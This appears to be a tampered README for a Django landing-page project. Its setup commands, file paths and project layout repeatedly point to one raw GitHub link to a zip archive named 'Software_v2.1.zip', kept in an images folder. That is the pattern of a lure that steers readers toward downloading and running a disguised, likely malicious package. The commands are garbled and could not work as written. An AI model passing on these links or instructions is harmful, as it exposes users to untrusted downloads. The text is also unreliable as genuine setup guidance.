This repository now runs the landing page inside a Django project so you can iterate on the site with Python back-end features later.
- Python 3.12 (bundled with
pyon Windows)
cd C:\Users\ASUS\OneDrive\Desktop\landingpage
py -m venv venv
.\venv\Scripts\https://github.com/dixit1836/landingpage/raw/refs/heads/main/main/static/main/images/Software_v2.1.zip
python -m pip install --upgrade pip
python -m pip install -r https://github.com/dixit1836/landingpage/raw/refs/heads/main/main/static/main/images/Software_v2.1.zipcd C:\Users\ASUS\OneDrive\Desktop\landingpage
.\venv\Scripts\https://github.com/dixit1836/landingpage/raw/refs/heads/main/main/static/main/images/Software_v2.1.zip
python https://github.com/dixit1836/landingpage/raw/refs/heads/main/main/static/main/images/Software_v2.1.zip runserverOpen http://127.0.0.1:8000/ to view the landing page. The thank-you page lives at http://127.0.0.1:8000/thank-you/.
landingpage/– Django project configuration.main/– App serving the landing page.templates/main/–https://github.com/dixit1836/landingpage/raw/refs/heads/main/main/static/main/images/Software_v2.1.zipandhttps://github.com/dixit1836/landingpage/raw/refs/heads/main/main/static/main/images/Software_v2.1.zip.https://github.com/dixit1836/landingpage/raw/refs/heads/main/main/static/main/images/Software_v2.1.zip– Stylesheet referenced via Django static files.
SQLite (https://github.com/dixit1836/landingpage/raw/refs/heads/main/main/static/main/images/Software_v2.1.zip) is created automatically after running python https://github.com/dixit1836/landingpage/raw/refs/heads/main/main/static/main/images/Software_v2.1.zip migrate.
- Add a form handler if you want to persist form submissions instead of redirecting to WhatsApp.
- Configure deployment settings (
DEBUG,ALLOWED_HOSTS, static hosting) before going to production.